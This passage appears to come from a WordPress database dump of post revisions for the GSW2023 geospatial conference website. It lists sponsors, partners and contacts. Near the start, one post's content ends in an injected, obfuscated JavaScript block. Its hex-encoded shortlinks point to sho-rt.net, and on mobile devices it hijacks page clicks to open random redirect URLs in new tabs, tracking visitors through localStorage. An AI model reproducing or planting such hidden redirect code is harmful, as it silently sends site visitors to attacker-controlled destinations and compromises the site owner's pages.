main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:15:14','2023-08-16 03:15:14','',3066,'https://gsw2023.com/?p=5287',0,'revision','',0),
(5288,1,'2023-08-16 03:16:00','2023-08-16 03:16:00','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and 